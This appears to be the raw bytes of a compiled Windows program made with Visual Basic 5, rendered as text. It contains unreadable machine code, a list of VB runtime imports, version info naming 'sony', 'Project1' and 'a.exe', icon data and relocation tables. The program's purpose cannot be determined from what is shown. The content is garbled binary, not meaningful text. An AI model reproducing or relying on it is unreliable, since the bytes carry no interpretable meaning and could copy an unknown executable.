�E�   �V����E�   �E�   �E�   f�U�f���Y  ��D���ǅH���   �E�    ��M��H����.  �M܋U�;�D����0  �E�   �E�Q��rB 9E�~�E�   �E�   �E�   �E�   �E�   �U��|���ǅt���@  �E�P�M�Q��t���R�E�P�TsB �M�Q��rB �ЍM���tB �}� tL�U�f�:uC�E̋M�+H��`����Ű�`���;Bsǅ���    ��hsB �������`����������hsB ������U�R�J  �M̋Q������
�M���tB �U�R�E�Pj��rB ���E�   �Mԃ���
  �M��E�   �����E�   �E�    �E�   f�U�f����
  ��<���ǅ@���   �E�    ��M��@�����
  �M܋U�;�<�����  �E�   �}� tL�E�f�8uC�M��U�+Q��`����E���`���;Hsǅ���    ��hsB �������`����� �����hsB �� ����}� tL�E�f�8uC�M̋U�+Q��\����E̋�\���;Hsǅ����    ��hsB ��������\�����������hsB �������E��H�� ���3���M����	  �ŰB������3ۊ���	  �u�������U��E�   �}� tL�E�f�8uC�M��U�+Q��`����E���`���;Hsǅ����    ��hsB ��������`�����������hsB �������E��H��������E��E�   �}� tL�M�f�9uC�U��E�+B��\����M���\���;Qsǅ����    ��hsB ��������\�����������hsB �������}� tL�M�f�9uC�U��E�+B��`����M���`���;Qsǅ����    ��hsB ��������`�����������hsB �������M��Q�E��H�������������2��E�   �}� tL�E�f�8uC�M��U�+Q��`����E���`���;Hsǅ����    ��hsB ��������`�����������hsB �������E��H�������EЈ�E�   � ����E�   �E�    �E�   �E�    �E�    �M�R��rB ��4���ǅ8���   �E�   ��E��8����V  �E��M�;�4�����  �E�!   �E܃��1  �M�����U��E�"   �}� tL�U�f�:uC�E��M�+H��`����U���`���;Bsǅ����    ��hsB ��������`�����������hsB �������U��B������3Ҋ�E����  �M�����U��E�#   �}� tL�U�f�:uC�E��M�+H��`����U���`���;Bsǅ����    ��hsB ��������`�����������hsB �������U��B��������U��E�$   �}� tL�E�f�8uC�M��U�+Q��\����E���\���;Hsǅ����    ��hsB ��������\�����������hsB �������}� tL�E�f�8uC�M��U�+Q��`����E���`���;Hsǅ����    ��hsB ��������`�����������hsB �������E��H�U��B�������������1��E�%   �}� tL�U�f�:uC�E��M�+H��`����U���`���;Bsǅ����    ��hsB ��������`�����������hsB �������U��B�������UЈ�E�&   �}� tL�E�f�8uC�M��U�+Q��`����E���`���;Hsǅ����    ��hsB ��������`�����������hsB �������}� tL�E�f�8uC�M��U�+Q��\����E���\���;Hsǅ����    ��hsB ��������\�����������hsB �������E��H������f��U��B������f�f�f�}�f���  f��f�f�}��E��E�'   �}� tL�M�f�9uC�U��E�+B��`����M���`���;Qsǅ����    ��hsB ��������`�����������hsB �������M��Q��������M��E�(   �E�   �E�   �U��|���ǅt���@  �E�P�M�Q��t���R�E�P�TsB �M�Q��rB �ЍM���tB �U�R�  f��f�EȍM���tB �M�Q�U�Rj��rB ���E�)   �E������f�U�f�E�f+���  3�f����ʅ�u,�E�*   f�E�f�M�f+���  f�U�f��w  f�U��.�E�+   �E���u�E�,   f�U�f�E�f+��G  f�E��E�.   �Mf�9���   �E�/   �=$@B  tq�$@B f�:uef�E�f�M�f��  f��f�f�}��ҡ$@B +P��`����$@B ��`���;Qsǅ����    ��hsB ��������`�������������hsB �������M�Q�$@B �B�����Pj�0sB �ЍM���tB P��rB �ЍM���tB �M���tB �   �E�1   �=$@B  t`�$@B f�9uTf�E�f�f�}��ҡ$@B +P��`����$@B ��`���;Qsǅ����    ��hsB ��������`�������������hsB �������M�Q�$@B �B�����Pj�0sB �ЍM���tB P��rB �ЍM���tB �M���tB �E�3   �,����E�4   �U؍M��<tB �sB h�B �0�M�����t	�M���tB �M���tB �U�R�E�Pj��rB ��ÍM���tB �M�Qj �sB �M���tB �U�Rj �sB ËEċM�d�    _^[��]� �tB �����������U���h�@ d�    Pd�%    �\   �]��SVW�e��E�8@ �E�    �E�    �E�   �E�   j��sB �E�   �E�    �E�   �U��M���rB �E�   �=$@B  tJ�$@B f�8u?�M�Q�dtB �$@B +B�E��$@B �M�;Hs	�E�    �	�hsB �E��U���U��	�hsB �E��$@B �HM�Qj�0sB �ЍM���tB P�U�P�lsB ���@��f��f�E��M���tB �M���t7�E�   �E�   �E�   �U�R�E�P�M�Q�ltB �ЍM���rB �����E�   �U�R��tB �E�h�B ��M���tB �M���rB ÍM���rB ÊE܋M�d�    _^[��]� ��������U���h�@ d�    Pd�%    ��   ���SVW�e��E�x@ �E�    �E�    �E�   �E�   j��sB �E�   �E�Q��rB ����sB f��X���fǅ\��� f�E� �f�U�f�\�����  f�U�f�E�f;�X����  �E�   �E�   �E�   �M�M��E�@  �U�R�E�P�M�Q�U�R�TsB �E���l���ǅd����  �U�R��d���P�`tB f��`����M�Q�U�Rj��rB ����`�������   �E�   �Mĉ�l���ǅd���   �E�   �E�   �U�U��E�@  �E�P�M�Q�U�R�E�P�TsB ��d���Q�U�R�E�P�ltB P��rB �ЍM���tB �M�Q�U�R�E�Pj��rB ���E�   �u܋M�R��rB 3�;����Uf�3�f;E���ʅ�u&�E�   �E�`p@ �E�   �U��M���tB �   �e�E�   �Ef�f;M�u$�E�   �UĉU��E�   �U��M���tB �y�.�E�   f�E�f ��   f�E��E�   �`p@ �M��<tB �E�   �M�R��rB �M�;�u"�E�   �UĉU��E�   �U��M���tB ��E�   ����h�B �+�E�����t	�M���rB �M�Q�U�R�E�Pj��rB ��ÍM���tB ËM�Ủ�EЉA�UԉQ�E؉A�E�M�d�    _^[��]� �tB ������U���h�@ d�    Pd�%    �(   �m
��SVW�e��E��@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �=�KB  uh�KB hDN@ �(tB �E��KB ��E��KB �U���E؋MQ�U�R�sB P�E؋�U�R�Q�Eԃ}� }jh4N@ �E�P�M�Q� sB �E���E�    �M���tB �E�    h
B �
�M���tB �ËU��MQ�P�E��M�d�    _^[��]� ����U���h�@ d�    Pd�%    ��   �=	��SVW�e��E�(@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �=�KB  uh�KB hDN@ �(tB ǅT����KB �
ǅT����KB ��T�����E��M�Q�U���M�Q�P�E��}� }jh4N@ �U�R�E�P� sB ��P����
ǅP���    �M܉M��U�R�E���U�R���   �E��}� } h�   hTN@ �E�P�M�Q� sB ��L����
ǅL���    �U�R�E��UR���   �E��}� } h�   hf@ �EP�M�Q� sB ��H����
ǅH���    �=�KB  uh�KB hDN@ �(tB ǅD����KB �
ǅD����KB ��D�����E��M�Q�U���M�Q�P��|�����|��� } jh4N@ �U�R��|���P� sB ��@����
ǅ@���    �M؉�x����U�R��x������x���R�QP��t�����t��� }#jPhTN@ ��x���P��t���Q� sB ��<����
ǅ<���    �U�R�E��UR���   ��p�����p��� }#h�   hf@ �EP��p���Q� sB ��8����
ǅ8���    �E� ��E�
   �E� ��E�
   �E��e��= @B  u�5h@ ��5h@ ����]����2  �E�   �   �Y���ԋE���M��J�E��B�M��J�   �6���ԋE���M��J�E��B�MĉJ�   ����ԋEȉ�M̉J�EЉB�MԉJ�E��e��= @B  u�5l@ ��5l@ ��������  Q�$�U��MQ���  ��l�����l��� }#h�  hf@ �UR��l���P� sB ��4����
ǅ4���    �M�Q�U�Rj��rB ���E�   �E�P�M��EP�RX�E��}� }jXhf@ �MQ�U�R� sB ��0����
ǅ0���    jj j j j j��E�P�P3����rB �E�   �<@B Qh`p@ �lsB ��to�E�   �U��MQ��  P�U�R�sB �E��<@B P�M���E�P�RT�E��}� }jTh�y@ �M�Q�U�R� sB ��,����
ǅ,���    �M���tB �E�    �h6B ��E�P�M�Qj��rB ���ËU��MQ�P�E��M�d�    _^[��]� �?�����U���h�@ d�    Pd�%    �(   ���SVW�e��E�p@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   �=�KB  uh�KB hDN@ �(tB �E��KB ��E��KB �U���E؋MQ�U�R�sB P�E؋�U�R�Q�Eԃ}� }jh4N@ �E�P�M�Q� sB �E���E�    �M���tB �E�    hjB �
�M���tB �ËU��MQ�P�E��M�d�    _^[��]� ����U���h�@ d�    Pd�%    ��(�USVW�M؉e�3�Q3ۉE�Rjd�E��@ �]�]��E܉]ԉ]��>L���=�rB ����;���   h   �PsB �5�tB �ЍM��֋E��M�PQ�ttB �U�PR�DL���׋EԍM�PQ��sB �M���tB �U�jRS�tB �ЍM���PS� tB ����   P�E�P�|tB �ЍM���Ph�y@ ��rB �ЍM��֍MЍU�QRj�DtB ��h�B �8�`p@ �M��<tB h�B �#�E�t	�M���tB �EЍM�PQj�DtB ��ÍM��%�tB ËM�E�_^d�    [��]� �tB �����U���h�@ d�    Pd�%    ��   �m��SVW�e��E�@ �E���E��M����M�E�    �U��MQ�P�E�   �E�   j��sB �E�   f��@B  �E�   �i+��f�E��E�   f�}�t�E�   ��rB �E�   �=�KB  uh�KB hDN@ �(tB ǅH����KB �
ǅH����KB ��H������x����M�Q��x������x���Q�P��t�����t��� }#jh4N@ ��x���R��t���P� sB ��D����
ǅD���    �M���p����U�R��p������p���R�QP��l�����l��� }#jPhtV@ ��p���P��l���Q� sB ��@����
ǅ@���    fǅ|���  ��D@ �M��<tB ��y@ �M��<tB ��|���R�E�P�M�Q�P����ЍM���tB �Uĉ�P����E�    �E�P��P����M���tB P��rB �ЍM���tB Pjj�j �tB �M�Q�U�R�E�P�M�Q�U�R�E�Pj�DtB ���M���tB �E�	   j�,tB P�M�Q�\sB �U�R��rB �й8@B ��tB �M���rB �E�
   jh8@B j �tsB �E�   j�`sB �E�   �E�8@B �E�@  �E�P�M�Q�4sB �U�R�E�P�LsB �M�Q��rB �ЍM���tB �U�R�E�P�M��EP��  �M�Q��rB �й8@B ��tB �M���tB �U�R�E�P�M�Qj��rB ���E�   �U�R��sB �E�P�M�Q�4sB �U�R�E�P�LsB �M�Q��rB �й4@B ��tB �U�R�E�P�M�Qj��rB ���E�   �U��MQ���  ��x�����x��� }#h�  h�d@ �UR��x���P� sB ��<����
ǅ<���    �E�   �M��EP��   ��x�����x��� }#h   h�d@ �MQ��x���R� sB ��8����
ǅ8���    �E�   �=�KB  uh�KB hDN@ �(tB ǅ4����KB �
ǅ4����KB ��4������x����U�R��x������x���R�Q��t�����t��� }#jh4N@ ��x���P��t���Q� sB ��0����
ǅ0���    �U���p����E�P��p������p���P�RP��l�����l��� }#jPhtV@ ��p���Q��l���R� sB ��,����
ǅ,���    �E؉�L����E�    ��L����M���tB �M�Q�U��MQ���  ��h�����h��� }#h�  h�d@ �UR��h���P� sB ��(����
ǅ(���    �M���tB �M���tB �E�   �=@B  uh@B h�:@ �(tB ǅ$���@B �
ǅ$���@B ��$������x�����x������x���R���  ��t�����t��� }&h�  h�D@ ��x���P��t���Q� sB �� ����
ǅ ���    �E�    h�#B �D�U�R�E�P�M�Q�U�R�E�P�M�Qj�DtB ���M���tB �U�R�E�P�M�Qj��rB ���ËU��MQ�P�E��M�d�    _^[��]� �������U���h�@ d�    Pd�%    �h   ����SVW�e��E�@ �E�    �E�    �E�   �E�     �E�   j��sB �E�   j�M�RhHk@ j � tB ����sB f�E��E�   f�E�f- ��   f�E��E�   �M�M��E�@  �U�Rj�E�P�M�Q�TsB �U�R��rB �ЋM��tB �E�P�M�Qj��rB ���E�   �U��E��E�   �U��M���tB h�$B �'�M�����t	�M���rB �U�R�E�Pj��rB ���ËM�Ủ�EЉA�UԉQ�E؉A3��M�d�    _^[��]� �tB ������������U���h�@ d�    Pd�%    �  �-���SVW�e��E�P@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   fǅL���  ��D@ �M��<tB �z@ �M��<tB ��L���P�M�Q�U�R�@����ЍM���tB �Ẻ�����E�    �M�R������M���tB P��rB �ЍM���tB Pjj�j�tB �E�P�M�Q�U�R�E�P�M�Qj�DtB ���E�   fǅL���  ��D@ �M��<tB h,z@ h�g@ ��rB �ЍM���tB Phdz@ ��rB �ЍM���tB ��L���R�E�P�M�Q�n����ЍM���tB �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ���������8�����t���Q��8������8���Q�P��4�����4��� }#jh4N@ ��8���R��4���P� sB �������
ǅ����    ��t�����0����U�R��0������0���R�QP��,�����,��� }#jPhtV@ ��0���P��,���Q� sB �������
ǅ����    �=�KB  uh�KB hDN@ �(tB ǅ�����KB �
ǅ�����KB ���������(�����p���Q��(������(���Q�P��$�����$��� }#jh4N@ ��(���R��$���P� sB �������
ǅ����    ��p����� ����U�R�� ������ ���R�QX���������� }#jXhtV@ �� ���P�����Q� sB �������
ǅ����    fǅH���  ��D@ �M��<tB ��z@ �M��<tB ��H���R�E�P�M�Q�J����Ѝ�|�����tB fǅD���  ��D@ �M��<tB ��z@ �M��<tB ��D���R�E�P�M�Q�����Ѝ�x�����tB �U��� ����E�    ��|���������ǅ|���    ��x���������ǅx���    �� ����M���tB Ph�g@ ��rB �ЍM���tB P�U�R��rB �ЍM���tB Ph�y@ ��rB �ЍM���tB P�E�P��rB �ЍM���tB Ph�z@ ��rB �ЍM���tB Ph�g@ ��rB �ЍM���tB Ph�z@ ��rB �ЍM���tB Ph�g@ ��rB �ЍM���tB P�������M���tB P��rB �ЍM���tB Ph�g@ ��rB �ЍM���tB P�������M���tB P��rB �ЍM���tB Pjh�i@ ��sB ����x���Q��|���R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ��l��p���P��t���Qj��rB ���E�   j�`sB �E�   fǅL���  ��D@ �M��<tB �z@ �M��<tB ��L���R�E�P�M�Q�����ЍM���tB �UЉ������E�    �E�Q�������M���tB P��rB ��h���ǅ`���   j ��`���R��sB ݝ<����E�P�M�Q�U�R�E�Pj�DtB ����`�����rB �h�,B �   ��x���Q��|���R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�R�E�P�M�Q�U�Rj�DtB ��l��p���P��t���Qj��rB ����`�����rB �ËU��MQ�P�E��M�d�    _^[��]� �������U���h�@ d�    Pd�%    �   ����SVW�e��E�@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   jj �d ����rB �E��UR�Q�E��M�d�    _^[��]� ��������U���h�@ d�    Pd�%    ��   �����SVW�e��E��@ �E�    �E�    �E��UR�Q�E�   �E�   j��sB �E�   ��h���P�M��EP�RX��`�����`��� } jXh�d@ �MQ��`���R� sB ��D����
ǅD���    j ��h���P������d�����rB ��d����M��E�   �}� �^  �E�   �U�R������h�����rB ��h����E��E�   �M�Q�@����h�����rB ��h����U��E�   �E܃��c  P�PsB �ЍM���tB �E�   �M܃��>  Q�U�R�E�P�ttB P�M�Q�&����h�����rB �U�R�E�P��sB ��h����M܍M���tB �E�	   �U�R��rB ����  P�E�P�|tB �ЍM���tB �E�
   �}� �  �E�   �M�Q�U��MQ�PP��`�����`��� } jPh�d@ �UR��`���P� sB ��@����
ǅ@���    �M�Q�U�R�lsB �������f��\����M���tB ��\�������  �E�   fǅl���  ��D@ �M��<tB �{@ �M��<tB �M�Q��l���R�E�P�M�Q������ЍM���tB P�lsB ���@��f��`����U�R�E�P�M�Qj�DtB ����`������  �E�   j�E�P�\sB �MЉM��E�@  �U�R�E�P�,sB �M�Q��rB ���@��f��x���ǅp���   �U�R�E�P��p���Q�U�R�@tB �E�P��rB �ЍM���tB �M�Q�U�R�E�P��p���Qj��rB ���E�   �U�R�E�P�ttB Pj �-����h�����rB �M�Q�U�R��sB ��h����EԍM���tB �E�   �}� t�E�   j��M�Q�U��MQ��  �E�   j�U�R�~����h�����rB ��h����E��E�   �$sB ����h�1B �/�M�Q�U�R�E�Pj�DtB ���M�Q�U�R�E�Pj��rB ��ÍM���tB ËM��EP�R�E��M�d�    _^[��]� �tB ���U���h�@ d�    Pd�%    �   �M���SVW�e��E�@@ �E�    �E�    �E�   �E�   j��sB �E�   f�}�u�E�   �E�    ��E�   �E�   �E�   �E�P�MQ������rB 3��M�d�    _^[��]� ̞���                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            <p ���������t �r Dp ���������t �r                     �t     �t u u *u 4u Bu Ru fu K �|u �u �u �u �u �u �u n ��u  �v v &v  �:v Lv Zv hv zv �v �v �v �v �v �v �v 
w w 0w V �W � �Bw 
 �Tw hw tw ~w w � � �x ��w  ��w �w �w �w  ��w �w x x $x � �3 �6x Dx Zx hx |x �x �x �x �x �x �x X ��x y y .y <y Ly Zy py �y �y �y _ �` ��y �y �y �y �y  �� �� �z z 0z @z � �Nz : �Zz hz zz �z � ��z @ ��z �z �z � �d  ��z �z �z { { *{ <{ h �H{ T{ i �d{ n{ ~{ �{ �{ �{ �{ �{ �{ �{ �{ �{ D �| E �    8|w    �t�$t�)t��
t�t#t�-tQt��tf t��t��t�b	t>�
t+tUxt,
t�O	t��
t�t�~t�5t�"t-t�t� tȥ
t��tT�t�	t	xt��t�	tR�t��t�xt^-	t�yt�a	t�ut<�tt��t5
t�t��
t	�t��t��t�tn0t�t`�t��t�)	t�9t��t*'t�t�t��tݿt��t�!t�tštV*t�t}�t�t>�
tK0t�t�5t�
tH�	ti
t�t�B
tJc
t�t�-t��tY+	t�t?=t$|tUyt��tD�t��t`�tr�t%�t6t�t�Jt�t�B
tt�(t��t�6t��t0�t8�t�xt�yt��t>�t��txBt	yt��tDst�t��t� t��t��t�thtC�t�!tx#t�/t�tĸt�B
t��t�t3�te�t[�t�tt��t��tx�t�tb^t�
t��t    oleaut32.dll  MSVBVM50.DLL    OleSavePictureFile    __vbaVarTstGt   __vbaVarSub   __vbaStrI2    _CIcos    _adj_fptan    __vbaVarMove    __vbaHresultCheck   __vbaVarVargNofree    __vbaAryMove    __vbaFreeVar    __vbaLenBstr    __vbaStrVarMove   __vbaEnd    __vbaFreeVarList    _adj_fdiv_m64   __vbaFreeObjList    __vbaStrErrVarCopy    _adj_fprem1   __vbaRecAnsiToUni   __vbaCopyBytes    __vbaResume   __vbaStrCat   __vbaLsetFixstr   __vbaSetSystemError   __vbaLenBstrB   __vbaHresultCheckObj    _adj_fdiv_m32   __vbaAryDestruct    __vbaExitProc   __vbaOnError    __vbaObjSet   _adj_fdiv_m16i    __vbaObjSetAddref   _adj_fdivr_m16i   __vbaStrFixstr    __vbaBoolVarNull    __vbaFpR8   _CIsin    __vbaErase    __vbaChkstk   __vbaFileClose    EVENT_SINK_AddRef   __vbaGenerateBoundsError    __vbaStrCmp   __vbaGet3   __vbaPutOwner3    __vbaVarTstEq   __vbaI2I4   DllFunctionCall   __vbaFpUI1    __vbaRedimPreserve    __vbaLbound   __vbaAryConstruct   _adj_fpatan   __vbaFixstrConstruct    __vbaLateIdCallLd   __vbaRedim    __vbaRecUniToAnsi   EVENT_SINK_Release    __vbaNew    __vbaUI1I2    _CIsqrt   EVENT_SINK_QueryInterface   __vbaUI1I4    __vbaStr2Vec    __vbaStrUI1   __vbaExceptHandler    __vbaStrToUnicode   __vbaPrintFile    _adj_fprem    _adj_fdivr_m64    __vbaFPException    __vbaInStrVar   __vbaUbound   __vbaStrVarVal    __vbaLsetFixstrFree   _CIlog    __vbaErrorOverflow    __vbaFileOpen   __vbaInStr    __vbaNew2   __vbaVarInt   _adj_fdiv_m32i    _adj_fdivr_m32i   __vbaStrCopy    __vbaFreeStrList    _adj_fdivr_m32    __vbaPowerR8    _adj_fdiv_r   __vbaVarTstNe   __vbaI4Var    __vbaAryLock    __vbaVarAdd   __vbaVarDup   __vbaStrToAnsi    __vbaFpI2   __vbaFpI4   __vbaVarCopy    _CIatan   __vbaStrMove    __vbaCastObj    __vbaStrVarCopy   _allmul   _CItan    __vbaUI1Var   __vbaFPInt    __vbaAryUnlock    _CIexp    __vbaFreeStr    __vbaFreeObj    __vbaI4ErrVar                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         �eH         X  �   @  �   (  �    �eH         �  �    �eH         �  �    �eH      1u  �  �2u  �  �3u  �  �    �eH      	  �       �eH                �eH                �eH          (      �eH          8  P� �  �      @� 0   �      p� (  �      �� �  �      �� 0  �              �4   V S _ V E R S I O N _ I N F O     ���                                           D     V a r F i l e I n f o     $    T r a n s l a t i o n     	�P   S t r i n g F i l e I n f o   ,   0 4 0 9 0 4 B 0   , 
  C o m p a n y N a m e     s o n y     4   P r o d u c t N a m e     P r o j e c t 1     , 
  F i l e V e r s i o n     1 . 0 0     0 
  P r o d u c t V e r s i o n   1 . 0 0     $   I n t e r n a l N a m e   a   4   O r i g i n a l F i l e n a m e   a . e x e            0  1u     �  2u   (  3u(                �                         �  �   �� �   � � ��  ��� ���   �  �   �� �   � � ��  ���                             �w   ���wp ����p  ����   ����   ���    � �    ��    �                                     ��  ��  ��  �  �  �  �  �  �  �  �  �  ��  ��  ��  ��  (       @         �                        �  �   �� �   � � ��  ��� ���   �  �   �� �   � � ��  ���                                                                                                          ��p          ����wp      ������wwp    ��������wp     ��������p      ��������        ��������        ��������        ��������        ��������        ��������        ��������        ��������        ������          ����  ��        ��  ��            ��            ��                                                                                                                                           �������������������������� �� �  �  �  � �� �� �� �� �� �� �� �� �� �� �� ?�����?������������������������������(       @                                ��� ��������������������������<����?���������������������������������������������=������<?������?�������������������������������������������������������� �� �  �  �  � �� �� �� �� �� �� �� �� �� �� �� ?�����?������������������������������                                                                                                                                                                                                                                                                                                                                                   x  00000 0$0(0,0004080<0@0D0H0L0P0\0`0d0l0t0|0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0111 1$1(1,1<1D1L1T1X1\1`1d1h1l1p1t1x1|1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1222222 2$2(2,20242D2L2T2\2`2d2h2l2p2t2x2|2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�2�23333 3$3(3,30343D3L3T3\3`3d3h3t3x3|3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3 44444444 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4 55555555 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5666666 6$6(64686<6D6L6P6T6X6\6`6d6h6l6p6t6x6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6 777777(7,747<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7�7�7�7�7�7�7�7�7�7�7�7�788$8,848<8D8L8T8\8d8l8p8t8|8�8�899(9<9D9L9T9\9d9h9t9|9�9�9�9�9�9�9�9�9�9�9:::::$:0:4:8:<:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�: ;;;;;;;;0;@;D;L;T;X;\;`;d;h;l;p;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;<<<<< <,<4<<<D<H<L<P<T<X<\<`<t<|<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�< =====$=,=4=8=<=@=D=H=T=\=d=l=p=t=x=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�= >>>>>>>> >$>(>,>0>4>8>T>\>`>d>h>l>p>t>x>|>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>�>?
????"?(?.?4?:?@?F?L?R?X?^?d?j?p?v?|?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?�?    �   000000$0*00060<0B0H0N0T0Z0`0f0l0r0x0~0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�0�011111 1&1,12181>1D1J1P1V1\1b1h1n1t1z1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�1�8�8�8�8�8�8�8�899949<9P9T9l9t9�9�9�9�9�9�9�9�9�9�9:H:d:h:l:�:0;�;�;�;�;�;�;�;�;�;�;�;�;�; <<< <(<0<4<8<<<@<D<L<P<T<X<\<x<0=8=D=H=`=h=p=x=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�= >>>>>>> >$>(>,>4>?$?(?0?4?8? 0  �  L1X1`1l1p1�1�1�1�1�1�1�1�1�1�1�1�1�1�1 22222222 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2h2l2p2x2|2�2�2�2�2 4(40484@4H4P4X4`4h4p4x4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4�4 5555 5(50585@5H5P5X5`5h5p5x5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5 6666 6(60686@6H6P6X6`6h6p6x6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6�6 7777 7(70787@7H7P7X7d7h7�7�7�7�7�7�7�7�7�7�7�7�7�7�788$848<8L8\8d8t8�8�8�8�8�8�8�8�8�8�8999999 9$9(9,909�9�9�9�9�9�90:4:8:<:@:D:�:�:�:�:�:�:�:�:;;;;(;,;8;H;P;`;p;x;�;�;�;�;�;�;�;�;�; <<<(<8<@<P<`<h<p<t<x<|<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<�<\=`=d=h=l=p=x=|=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�=�= >`>d>h>l>p>t>�?�?�?�?�?�?�?�?�?   @      00000080@0H0`0h0p0x0�0�0�0�0�0�0�0�0�0�0�0 11 1(10181P1X1h1p1�1�1�1�1�1�1�1�1�1�1�1�1P2T2X2\2`2d2p2t2x2|2�2�2�2�2�2�2�2�2�2�2�2 33333333 3$3(3,303�3�3�3�3�3�3�3�3�3�3�3�3�3�3�3H5X5\5`56666$6)6T6X6`6e6p6u6�6�6�6�6�6�6�6�6�6�67	7$7(70757@7E7`7d7l7q7|7�7�7�7�7�7�7�7�7�7�7�7 88$8(80858@8E8`8d8l8q8|8�8�8�8�8�8�8�8�8�8�8�89	989<9D9I9T9Y9|9�9�9�9�9�9�9�9�9�9�9�9�9�9:	:::�;�;�;�;�;�;<<<<$<)<D<H<P<U<`<e<�<�<�<�<�<�<�<�<�<�<�<�<�< =====8=<=D=I=T=Y=�=�=�=�=�=�=H>L>�>�>�>�>�>�>�>�>�>�>�>�>�?�?�?�?�?�?�?�?�?�?�?�? P  �  00$0)04090P0T0\0a0l0q0�0�0�0�0�0�0�0�0�0�0�0�0 11111!1@1D1L1Q1\1a1|1�1�1�1�1�1�1�1�1�1�1�1�1�1�1222(2,24292D2I2d2h2p2u2�2�2�2�2�2�2�2�2�2�2�2�2�2�23333 3%3<3@3H3M3X3]3t3x3�3�3�3�3�3�3�3�3�3�3�3�3�3�34	4 4$4,414<4A4X4\4d4i4t4y4�4�4�4�4�4�4�4�4�4�4�4�45555(5-5L5P5X5]5h5m5�5�5�5�5�5�5�5�5�5�5�5�56666$6)6H6L6T6Y6d6i6�6�6�6�6�6�6�6�6�6�6�677 7(7-787=7X7\7d7i7t7y7�7�7�7�7�7�7�7�7�7�7�7�788$8)84898`8d8l8q8|8�8�8�8�8�8�8�8�8�8�8�8994989@9E9P9U9|9�9�9�9�9�9�9�9�9�9�9�9:::!:,:1:X:\:d:i:t:y:�:�:�:�:�:�:�:�:�:�:;	;(;,;4;9;D;I;d;h;p;u;�;�;�;`<t<x<�<�<�<�<�<�< =$=,=1=<=A=|=�=�=�=�=�=�=�=�=�=�=�=�= >>>>>8><>D>I>T>Y>t>x>�>�>�>�>�>�>�>�>�>�>�> ?????@?D?L?Q?\?a?|?�?�?�?�?�?�?�?�?�?�?�? `  l   000!0,010T0X0`0e0p0u0�0�0�0�0�0�0�0�0�0�0�0�0h1x1|1�1J48888(8-8T8X8`8e8p8u8�8�8�8�8�8�8@>D>   p  \   H2L2T2Y2d2i2�2�2�2�2�2�2�2�2�2�2�2�2�8�8�8�8�8�8�8�89	999<9@9H9M9X9]9�9�9�9�9�9�9 �  �   �:�:�:�:�:�:�:�:�:�:�:�:�:�:�:�: ;;;;;$;(;0;4;8;P;T;X;\;d;h;l;t;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�;�; <<<<<<<< <$<8<\<�<�<�<�<=4=X=|=�=�=�=>0>T>x>�>�>�>?,?P?t?�?�?�? �  �  0(0L0p0�0�0�0 1$1H1l1�1�1�1�1�1�1242\2p2�2�2�2�2�2 33,3@3H3X3\3h3p3�3�3�3�3�3�3444404D4L4P4T4p4�4�4�4�4�4�4�4�4�4�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5�5064686<6@6D6H6L6P6T6X6\6`6d6h6l6�6�6�6�6�6�67788,8084888<8@8D8H8L8`8d8h8�8�8�8�8�8�8x9|9�9�9�9�9�9�9�9�9:2:;:@:I:e:p:�:�:�:�:�:�:;;%;F;^;�;�;�;�;�;�;�;;<Q<�<�<�<�<�<===2=[=g=�=�=
>> >&>->2>8>>>S>w>�>�>�>�>�>�>�>�> ??&?/?@?P?]?�?�?   �  l  000&040=0J0W0c0o0y0�0�0�0�0�01L1Y1a1f1l1v1�1�1�1�122'2,252U2\2g22�2�2�2�2�2�2�2�2�2D3R33�3�3�3�3�3
